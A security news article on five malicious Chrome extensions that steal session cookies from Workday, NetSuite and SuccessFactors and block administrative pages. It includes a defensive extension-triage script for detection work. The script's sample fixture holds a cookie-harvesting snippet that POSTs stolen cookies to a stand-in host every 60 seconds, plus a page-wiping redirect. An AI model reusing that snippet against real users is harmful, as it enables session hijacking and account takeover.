Five purpose-built malicious Chrome extensions are targeting the human resources and enterprise resource planning (ERP) platforms that many organizations run their back office on. Working in concert, they steal authentication tokens, disable security controls from inside the victim's browser, and use the stolen session to take over accounts. The campaign specifically targets Workday, NetSuite, and SAP SuccessFactors, which hold sensitive employee and financial data for thousands of organizations worldwide.
The operators released four of the extensions under the umbrella name "databycloud1104"; a fifth, branded "Software Access," is published separately but shares the same infrastructure and attack code. Between them, the five extensions have been installed by more than 2,300 users across enterprise environments. Rolling them out together under two publisher names points to a planned campaign designed to slip past standard extension vetting and endpoint defenses rather than opportunistic malware.
Analysts at Socket.dev, who identified the extensions through code analysis, found the malicious functionality hidden behind misleading marketing. The extensions are advertised as productivity tools for switching between multiple accounts; in reality they harvest session credentials and deliberately hinder security teams' ability to respond while an attack is in progress.
Advanced Attack Techniques for Enterprise Takeover
The most concerning capability is the bidirectional cookie injection implemented by the Software Access extension. It reads the victim's authentication cookies and lets the operator load them directly into a browser of their own. Because a session cookie is issued only after login and any MFA challenge have completed, replaying it yields a logged-in session without a password or a second factor: MFA is not defeated so much as never invoked. The other extensions in the campaign re-harvest session tokens every 60 seconds, so the attacker holds a current token even when the user logs out and back in during the working day, giving persistent unauthorized access for as long as the extension remains installed.
The coordinated nature of these malicious Chrome extensions underscores a growing trend in cyber threats targeting business-critical applications. While many threats focus on initial access, this campaign focuses on maintaining deep, persistent access and actively preventing remediation, representing a significant escalation in the sophistication of browser-based attacks against corporate infrastructure.
Infection Mechanism and Persistence Through Administrative Blocking
The extensions pair credential theft with a persistence mechanism aimed squarely at incident response: they block access to the platforms' own administrative interfaces. A content script watches the page content, and when the user navigates to a security administration page it erases the page and redirects the browser to a non-functional URL.
Specifically, the "Tools Access 11" extension has been observed blocking 44 administrative pages within Workday, and the "Data By Cloud 2" extension extends the blockade to a further 12 pages, covering password resets, account deactivation, multi-factor authentication device management, and security audit log access. Together these blocks cripple an organization's ability to respond to a breach in progress from any browser where the extension is installed.
The blocking is driven by a MutationObserver on the page combined with a re-check every 50 milliseconds (a MutationObserver fires on DOM changes rather than on a timer, so the 50 ms figure implies a polling loop running alongside it). When an administrator opens a password-reset or account-deactivation page in an affected browser, the extension replaces the page with a blank screen and redirects to a malformed URL. The result is a containment failure: from that browser the organization can neither cut off the attacker nor clean up the account, and is left choosing between tolerating the access and migrating affected users to entirely new accounts. The block is enforced only by the extension's content script, however, so the same administrative pages remain reachable from a clean workstation without the extension, which is where remediation should be performed.
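The two behaviours described above, cookie harvesting scoped to HR/ERP hosts with a periodic collector and a MutationObserver that wipes and redirects administrative pages, leave a recognisable footprint in an extension's manifest and scripts. The following Node.js triage script is an added example written for this article, not code from the Socket.dev report or from the extensions it describes. It scores an unpacked extension on the combination of a `cookies` permission, host patterns matching the platforms the article names, and source-level indicators of the two behaviours. The sample manifests and scripts, the `/admin/` path and the `collector.invalid` host are constructed fixtures, and the indicator regexes and verdict thresholds are my own assumptions.

```javascript
// Added example (not the report's or the extensions' own code): static triage of an
// unpacked Chrome extension for the pattern the article describes. All fixtures below
// are constructed; indicator regexes and thresholds are the author's assumptions.

// Host patterns for the platforms the campaign targets (heuristic substring match).
const TARGET_HOSTS = [/workday\.com/i, /netsuite\.com/i, /successfactors\.(com|eu)/i];

// Source-level indicators, one per behaviour the article describes.
const CODE_INDICATORS = [
  { name: "cookie-read",     re: /chrome\.cookies\.getAll\s*\(/ },                 // bulk session-cookie read
  { name: "cookie-write",    re: /chrome\.cookies\.set\s*\(/ },                    // cookie injection
  { name: "exfil-post",      re: /fetch\s*\([^)]*\{[^}]*method\s*:\s*['"]POST['"]/ },
  { name: "dom-observer",    re: /new\s+MutationObserver\s*\(/ },
  { name: "page-wipe",       re: /document\.(body|documentElement)\.innerHTML\s*=\s*(['"`])\2/ },
  { name: "forced-redirect", re: /location\.(replace|assign|href)\s*[=(]/ },
];
// Captures the delay argument of every setInterval(fn, ms) call.
const INTERVAL_RE = /setInterval\s*\([\s\S]*?,\s*(\d+)\s*\)/g;

function isTargetHost(pattern) {
  return TARGET_HOSTS.some((re) => re.test(pattern));
}

// Every host pattern the extension can reach, across MV2 and MV3 manifest layouts.
function hostPatterns(manifest) {
  return [
    ...(manifest.host_permissions || []),
    ...(manifest.permissions || []).filter((p) => p.includes("://")), // MV2 puts hosts here
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ];
}

// ext = { manifest: <parsed manifest.json>, scripts: { filename: source } }
function triageExtension(ext) {
  const m = ext.manifest;
  const perms = new Set(m.permissions || []);
  const targeted = hostPatterns(m).filter(isTargetHost);
  const source = Object.values(ext.scripts || {}).join("\n");
  const findings = [];
  if (perms.has("cookies")) findings.push("perm:cookies");
  if (targeted.length) findings.push(`hosts:${targeted.join(",")}`);
  for (const ind of CODE_INDICATORS) if (ind.re.test(source)) findings.push(`code:${ind.name}`);
  const intervalsMs = [...source.matchAll(INTERVAL_RE)].map((x) => Number(x[1]));
  if (intervalsMs.length) findings.push(`timers:${intervalsMs.join(",")}ms`);

  const has = (f) => findings.includes(f);
  // Session theft needs cookie access, a target host, and code that actually reads or writes cookies.
  const sessionTheft = perms.has("cookies") && targeted.length > 0 &&
    (has("code:cookie-read") || has("code:cookie-write"));
  // Admin blocking needs a target host plus observer + wipe + redirect together.
  const adminBlocking = targeted.length > 0 && has("code:dom-observer") &&
    has("code:page-wipe") && has("code:forced-redirect");
  let verdict = "low";
  if (sessionTheft || adminBlocking) verdict = "high";
  else if (perms.has("cookies") && targeted.length > 0) verdict = "medium";
  return { name: m.name, verdict, sessionTheft, adminBlocking, intervalsMs, findings };
}

// Constructed fixtures. SAMPLES[1] mirrors the article's description in miniature; it is
// not the real extensions' code, and collector.invalid is a reserved, unresolvable name.
const SAMPLES = [
  {
    manifest: { name: "Sample Tab Notes", manifest_version: 3,
      permissions: ["storage", "tabs"], host_permissions: ["https://*.example.com/*"] },
    scripts: { "background.js":
      `chrome.tabs.onUpdated.addListener((id, info) => { if (info.status === "complete") chrome.storage.local.set({ last: id }); });` },
  },
  {
    manifest: { name: "Sample Multi-Account Helper", manifest_version: 3,
      permissions: ["cookies", "storage", "alarms"],
      host_permissions: ["https://*.myworkday.com/*", "https://*.netsuite.com/*"],
      content_scripts: [{ matches: ["https://*.myworkday.com/*"], js: ["content.js"] }] },
    scripts: {
      "background.js": `setInterval(async () => {
        const c = await chrome.cookies.getAll({ domain: "myworkday.com" });
        await fetch("https://collector.invalid/upload", { method: "POST", body: JSON.stringify(c) });
      }, 60000);`,
      "content.js": `const guard = () => {
        if (location.pathname.startsWith("/admin/")) { document.body.innerHTML = ""; location.replace("https://invalid/"); }
      };
      new MutationObserver(guard).observe(document, { childList: true, subtree: true });
      setInterval(guard, 50);`,
    },
  },
];

for (const r of SAMPLES.map(triageExtension)) {
  console.log(`${r.name}: ${r.verdict}`, r.findings.join(" | "));
}
```

To run this against a real unpacked extension, load `manifest.json` and the `.js` files from the extension directory into the `{ manifest, scripts }` shape; the verdicts are a starting point for manual review, not a signature, since a legitimate multi-account tool can also hold the `cookies` permission for these hosts.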
The domains associated with the extensions, databycloud[.]com and software-access[.]com, are currently inactive or returning errors, which may indicate the operators covering their tracks or a temporary disruption of their infrastructure. The code and attack pattern, not the domains, remain the primary concern: the extensions keep working in any browser where they are already installed.
Organizations that use Workday, NetSuite, or SuccessFactors should audit installed browser extensions for these names and publishers, remove them, and then invalidate the affected users' active sessions and rotate their credentials, since a password reset alone does not revoke session cookies that have already been copied. Going forward, restricting extension installation through Chrome enterprise policy (an ExtensionInstallBlocklist of "*" with an ExtensionInstallAllowlist of approved extensions) closes the installation path that this campaign relied on, and endpoint detection and response (EDR) coverage should include extension installs and changes. Ongoing analysis by security researchers will likely surface further detail on the operators' infrastructure and impact; the persistence built into these extensions means detection and cleanup need to be treated as continuous work rather than a one-off response.

